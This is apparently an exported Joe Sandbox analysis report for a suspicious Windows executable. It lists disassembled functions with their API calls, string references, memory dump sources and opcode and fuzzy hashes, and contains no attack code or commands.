GetLastError.KERNEL32 ref: 00007FF728777D83

Strings

internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs, xrefs: 00007FF728777ED1

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: ErrorLast$EnvironmentVariable
String ID: internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs
API String ID: 2691138088-50058851
Opcode ID: 6d5b2da78fe2a7d3d0cf03d165010f37d5f18a7676820ac551e906dfb98e3d0b
Instruction ID: 1bd738dce77cf9871eb1c316ea40d2a53498a86abbe46a6db66412ef9ec32ca0
Opcode Fuzzy Hash: 6d5b2da78fe2a7d3d0cf03d165010f37d5f18a7676820ac551e906dfb98e3d0b
Instruction Fuzzy Hash: D7810362A44AC185EB31AFA5DC443E8E365FB08BD8F844132DE5C5B795DF3D9281C728

Function 00007FF72877A760 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF728777980: SetLastError.KERNEL32 ref: 00007FF728777A79
Part of subcall function 00007FF728777980: GetCurrentDirectoryW.KERNEL32 ref: 00007FF728777A85
Part of subcall function 00007FF728777980: GetLastError.KERNEL32 ref: 00007FF728777A92
Part of subcall function 00007FF728777980: GetLastError.KERNEL32 ref: 00007FF728777AAC

memset.VCRUNTIME140(?), ref: 00007FF72877A87C
RtlCaptureContext.NTDLL ref: 00007FF72877A884
RtlLookupFunctionEntry.NTDLL ref: 00007FF72877A8D5
RtlVirtualUnwind.NTDLL ref: 00007FF72877AA73

Strings

stack backtrace:, xrefs: 00007FF72877A7FF
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...], xrefs: 00007FF72877AAE2

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookupUnwindVirtualmemset
String ID: note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...]$stack backtrace:
API String ID: 2744335978-2918537110
Opcode ID: 72805cd616d666f2ac6967fcb4c1961583533f6335081f1f1fdb27a414d68f49
Instruction ID: f104d2741966e895ff52243b824f4328295e6c5c62deb8888b409f594ede4db0
Opcode Fuzzy Hash: 72805cd616d666f2ac6967fcb4c1961583533f6335081f1f1fdb27a414d68f49
Instruction Fuzzy Hash: FCA15C22604FC18CEB719F61DC407EAB7A0FB0978DF84012ACA8D4BB99DF399255CB15

Function 00007FF728777980 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF728777A79
GetCurrentDirectoryW.KERNEL32 ref: 00007FF728777A85
GetLastError.KERNEL32 ref: 00007FF728777A92
GetLastError.KERNEL32 ref: 00007FF728777AAC
GetLastError.KERNEL32 ref: 00007FF728777B59

Strings

internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs, xrefs: 00007FF728777B8D

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: ErrorLast$CurrentDirectory
String ID: internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs
API String ID: 3993060814-50058851
Opcode ID: 405081b865c5e5ce2a1847109fdb6946bbed8eb7c725cbd3201916c53e7494c6
Instruction ID: 58d05672caeafdd6c3f9a145d16bc9f12c233d7412d66159e8ca314edcbe4ef7
Opcode Fuzzy Hash: 405081b865c5e5ce2a1847109fdb6946bbed8eb7c725cbd3201916c53e7494c6
Instruction Fuzzy Hash: 4751D062A84BC245E731AFA9AC443F9E254FB09BE8F844136DE6C17785DE3DA381C714

Function 00007FF72877DA30 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF72877DA5B
GetLastError.KERNEL32 ref: 00007FF72877DA74
GetConsoleMode.KERNEL32 ref: 00007FF72877DAB4
CloseHandle.KERNEL32 ref: 00007FF72877DD3A

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF72877DCB8

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: Handle$CloseConsoleErrorLastMode
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 1170577072-2333694755
Opcode ID: e01a37204d0ed50316ae64f771dd6798684bd3ff6aa2ef4f1ae7c1548a6cce87
Instruction ID: 1433b60e11880c2e3dc27daa07eb74a9de64c131a054327cf6f13ca39979b4eb
Opcode Fuzzy Hash: e01a37204d0ed50316ae64f771dd6798684bd3ff6aa2ef4f1ae7c1548a6cce87
Instruction Fuzzy Hash: B481B461A4868288FB11ABA0EC403FDEB61EB18798F844133DE5D177D9DE7EE185C724

Function 00007FF72877DD50 Relevance: 7.7, APIs: 5, Instructions: 156COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF72877DDD5
WriteConsoleW.KERNEL32 ref: 00007FF72877DE12
WriteConsoleW.KERNEL32 ref: 00007FF72877DE71
GetLastError.KERNEL32 ref: 00007FF72877DE7B
GetLastError.KERNEL32 ref: 00007FF72877DF0E

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: ConsoleErrorLastWrite$ByteCharMultiWide
String ID:
API String ID: 1956605914-0
Opcode ID: 0fe4d206bdc36d7527652ce4d84f90233b9924d4907be3a152e2467c999bc63b
Instruction ID: 92814739246cf23019c2deee3311b39b7cb7eab1feb7f13b9fe1e3f128be349a
Opcode Fuzzy Hash: 0fe4d206bdc36d7527652ce4d84f90233b9924d4907be3a152e2467c999bc63b
Instruction Fuzzy Hash: B5513961A4C65241F720AB90EC043BAEA51EF88790FD44137E99D43BD8DF7EE585CB24

Function 00007FF72877E6D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF72877E6E3
GetProcAddress.KERNEL32 ref: 00007FF72877E6F8

Strings

kernel32, xrefs: 00007FF72877E6DC
SetThreadDescription, xrefs: 00007FF72877E6EE

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: SetThreadDescription$kernel32
API String ID: 1646373207-1950310818
Opcode ID: 88fa0e13c17c9b79e8c73b9d4447e022dd5f321e9298a6fccb875f5b167bc93c
Instruction ID: 91bdc792a21253d1bfe2fb88942cba3f8ce75a83aa8b812155e481d13a496458
Opcode Fuzzy Hash: 88fa0e13c17c9b79e8c73b9d4447e022dd5f321e9298a6fccb875f5b167bc93c
Instruction Fuzzy Hash: D0F0A020B8A78681ED05AB86AC441A8E260EF0CFC1FC4443BC81D07360EE3DA145CB64

Function 00007FF72877BBE0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON

Download Yara Rule

Strings

Box<dyn Any><unnamed>, xrefs: 00007FF72877BC88
cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 00007FF72877BF1C, 00007FF72877BF59

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
API String ID: 0-3513654867
Opcode ID: ac8c48a5e2f6dbcb9a386e2807e7f6b30d02f319061442bdbbba9e6a5cce45a5
Instruction ID: 7bab81b0eab6294690554bf84833ffc87bda4138ccd1f19dd70a54046012d457
Opcode Fuzzy Hash: ac8c48a5e2f6dbcb9a386e2807e7f6b30d02f319061442bdbbba9e6a5cce45a5
Instruction Fuzzy Hash: C3B1B122A49A4189EB21AFA0DC403BDF7A0EB58748FC44537DA4D07B94DF3EE455CB64

Analysis Process: nlkuzmdacjrb.exePID: 5608, Parent PID: 632COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	4.1%
Signature Coverage:	0%
Total number of Nodes:	74
Total number of Limit Nodes:	6

Executed Functions

Function 00000122A4921394 Relevance: 1.5, APIs: 1, Instructions: 38
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySecurityObject.NTDLL ref: 00000122A49213F7

Memory Dump Source

Source File: 00000012.00000002.2252186094.00000122A4921000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000122A4921000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_122a4921000_nlkuzmdacjrb.jbxd

Similarity

API ID: ObjectQuerySecurity
String ID:
API String ID: 718582247-0
Opcode ID: 3e6086999d909772927b4a53b8ab5f9f85d395806cf9dc02ee7e905097e990c9
Instruction ID: 86b898a001e1c0b66af299c78302967eaf64543df454fd0e8b8a3113191363a6
Opcode Fuzzy Hash: 3e6086999d909772927b4a53b8ab5f9f85d395806cf9dc02ee7e905097e990c9
Instruction Fuzzy Hash: E1F01470519B059FEB48EF28D85991ABBF1F7A8341F00892EE489D3271DF38D590CB82

Function 00007FF63B55D164 Relevance: 12.1, APIs: 8, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF63B55D18D
__scrt_release_startup_lock.LIBCMT ref: 00007FF63B55D1FB
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF63B55D249
_get_initial_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF63B55D24E
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF63B55D256
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF63B55D25E
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF63B55D280
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF63B55D2DA

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
String ID:
API String ID: 1133592946-0
Opcode ID: 8f35b274382aea9d74736abc4321152b8662125592f65204fea856f61f15728e
Instruction ID: 8a01cdd2542bce5a9236ce9f2ce3bad7576a5ee221f81c13aca2cac1ca8eb0cd
Opcode Fuzzy Hash: 8f35b274382aea9d74736abc4321152b8662125592f65204fea856f61f15728e
Instruction Fuzzy Hash: 62313D23E0860742FA50BF65A451BB91351AF8D7A6F444036EACFC73F7DE6CE845A209

Function 00000122A433D964 Relevance: 7.7, APIs: 5, Instructions: 174
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000122A433D986

Memory Dump Source

Source File: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000122A40B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_122a40b0000_nlkuzmdacjrb.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3384dbaf04124ae408191e174ba91d228b647bba7aee9aeb13463d67c128df74
Instruction ID: 8d7aeb092de7804f8932d132c4f728446b0f7386709f8a12d142233bdd9371de
Opcode Fuzzy Hash: 3384dbaf04124ae408191e174ba91d228b647bba7aee9aeb13463d67c128df74
Instruction Fuzzy Hash: 6451A730B1890E8FDF84EEACD884BAE73F5FBA8314F104695E419D7694DA74EA50CB41

Function 00000122A433DB6B Relevance: 7.7, APIs: 5, Instructions: 174
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000122A433DB8D

Memory Dump Source

Source File: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000122A40B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_122a40b0000_nlkuzmdacjrb.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f3343c76b6cd9d232af124fb01760c8ff8c6bf56e7b46f00006a0382ca75c8d6
Instruction ID: e76aff6ad45ae2d309a2db62e7957fc29384d186760282be5ba9009f1b6250a6
Opcode Fuzzy Hash: f3343c76b6cd9d232af124fb01760c8ff8c6bf56e7b46f00006a0382ca75c8d6
Instruction Fuzzy Hash: 9B51E930B1890E8FDF84EEACD884BAE73F5FBA8314F104665E41AD7694DA74E950CB41

Function 00007FF63B544A10 Relevance: 4.6, APIs: 3, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FF63B544A96

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6e9120aa9af772301a4a386b5b1c0067b3c901f9ce423e8083d5da3411376083
Instruction ID: 4ac704b65d24a3bfbc0a64a3885b27542aef47353f051e695dfe0181b63a0c59
Opcode Fuzzy Hash: 6e9120aa9af772301a4a386b5b1c0067b3c901f9ce423e8083d5da3411376083
Instruction Fuzzy Hash: 5531CE32B04A0186FB608F65E444BAD6661BB887B8F144234EFED87BEADF7CD4518300

Function 00000122A433A434 Relevance: 3.4, APIs: 2, Instructions: 399
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000122A433A439

Memory Dump Source

Source File: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000122A40B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_122a40b0000_nlkuzmdacjrb.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 92c0ea50874150b054a817daf60ee9fc003736d41b50868d266c4d75121e88d1
Instruction ID: 512332ba6d81b3da8c353500fe2a467b70062a1335a8694128f9d468ab5b774c
Opcode Fuzzy Hash: 92c0ea50874150b054a817daf60ee9fc003736d41b50868d266c4d75121e88d1
Instruction Fuzzy Hash: F4E18E30A1490D9FEF94EB9CD485FAEB7F1FB98304F6045A4E109DBA91DA74E891CB40

Function 00007FF63B54527C Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumProcessModulesEx.PSAPI ref: 00007FF63B545267
memset.VCRUNTIME140 ref: 00007FF63B5452C3

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: EnumModulesProcessmemset
String ID:
API String ID: 2788162479-0
Opcode ID: b080baafe9dc283cbf222f303f25dea2ccf790df6adc1ae6ee288a2e3dca6954
Instruction ID: fbfc2f9a378acde28916ded30420b138e4f9da880b6c061885914984d05dd781
Opcode Fuzzy Hash: b080baafe9dc283cbf222f303f25dea2ccf790df6adc1ae6ee288a2e3dca6954
Instruction Fuzzy Hash: C911E962F1865145EB00DF65A5053AE2361FB09BB8F900621DE6D637E6CF38E655F304

Function 00007FF63B5456B0 Relevance: 2.5, APIs: 2, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 00007FF63B5456CB
GetLastError.KERNEL32 ref: 00007FF63B5456E0

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ba2161fbdca203ce282a3bad5a3a37409828693ed662d9c325a3d7b7554e52e4
Instruction ID: 3f3526cb9b5417b13969b827c95978b3dba97da6da668d77f3a2a5f234d84737
Opcode Fuzzy Hash: ba2161fbdca203ce282a3bad5a3a37409828693ed662d9c325a3d7b7554e52e4
Instruction Fuzzy Hash: A2110A36F10B419CE7209FB0E4453EC37B8B748328F544235DAAC96BA9EF389199C750

Function 00000122A433B9B1 Relevance: 2.0, APIs: 1, Instructions: 708
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000122A433BC36

Memory Dump Source

Source File: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000122A40B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_122a40b0000_nlkuzmdacjrb.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fdae6b7c3fcf00f9228dbd9d5a3c96208eade3a9fdb42b23f6d738a870b35c23
Instruction ID: 8f4039cc41d2e65a49bb5b18d889b0f82800dd1930b08185e750ca2771c08191
Opcode Fuzzy Hash: fdae6b7c3fcf00f9228dbd9d5a3c96208eade3a9fdb42b23f6d738a870b35c23
Instruction Fuzzy Hash: 8B52C170604A8D8FDFA4EF5CC888BE937E1FB68315F148165E84DCB661DA74EA91CB40

Non-executed Functions

Function 00007FF63B54FC10 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 378libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00000001,00000000,00007FF63B54F959), ref: 00007FF63B54FC42
GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,00007FF63B54F959), ref: 00007FF63B54FC7F
GetProcAddress.KERNEL32 ref: 00007FF63B54FCD2
memset.VCRUNTIME140(?,?,?,?,00000001,00000000,00007FF63B54F959), ref: 00007FF63B54FDD9
GetProcAddress.KERNEL32 ref: 00007FF63B54FE0E

Strings

SymAddrIncludeInlineTrace, xrefs: 00007FF63B54FC78
X, xrefs: 00007FF63B54FDE9
SymGetLineFromInlineContextW, xrefs: 00007FF63B55018C
SymFromInlineContextW, xrefs: 00007FF63B54FE07
SymQueryInlineTrace, xrefs: 00007FF63B54FCCB
(, xrefs: 00007FF63B550169

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: AddressProc$CurrentProcessmemset
String ID: ($SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$X
API String ID: 3017635649-489855731
Opcode ID: 91fedcdd78195c4bbe2e5efc2779d755cb09886c5593213c54159d6beb6d4a23
Instruction ID: 7da64291b7beac43c81a0a0b5ebab6a691543ee9c202ef4ae814512253f25afa
Opcode Fuzzy Hash: 91fedcdd78195c4bbe2e5efc2779d755cb09886c5593213c54159d6beb6d4a23
Instruction Fuzzy Hash: D502A032908AC682EB668F18E4513FA77A0FB883A4F444236DACE837A5DF3DD545D740

Function 00007FF63B55D6F0 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF63B55D70C
memset.VCRUNTIME140 ref: 00007FF63B55D730
RtlCaptureContext.NTDLL ref: 00007FF63B55D739
RtlLookupFunctionEntry.NTDLL ref: 00007FF63B55D753
RtlVirtualUnwind.NTDLL ref: 00007FF63B55D794
memset.VCRUNTIME140 ref: 00007FF63B55D7C7
IsDebuggerPresent.KERNEL32 ref: 00007FF63B55D7E8
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF63B55D805
UnhandledExceptionFilter.KERNEL32 ref: 00007FF63B55D810

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 1f7091696ee9927cd8a0f810869b6f58b34cd09c9738cf120ea40d67f48f4156
Instruction ID: 3719e6083a95dd8c2ebdf7a001fe832bd1bdda5411dc4fa4db8f9b0526706868
Opcode Fuzzy Hash: 1f7091696ee9927cd8a0f810869b6f58b34cd09c9738cf120ea40d67f48f4156
Instruction Fuzzy Hash: D6318173609B8186EB60CF60E8807ED3360FB88715F44403ADA8E87BAADF78C548D714

Function 00007FF63B54F4E0 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 345libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObjectEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF63B54F52B
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF63B54F544
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF63B54F57D
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF63B54F5B7
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF63B54F5EF
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF63B54F608
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF63B54F65D
GetProcAddress.KERNEL32 ref: 00007FF63B54F692
GetCurrentProcess.KERNEL32 ref: 00007FF63B54F6AB
lstrlenW.KERNEL32 ref: 00007FF63B54F6C9
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF63B54F701
CreateMutexA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF63B54F795
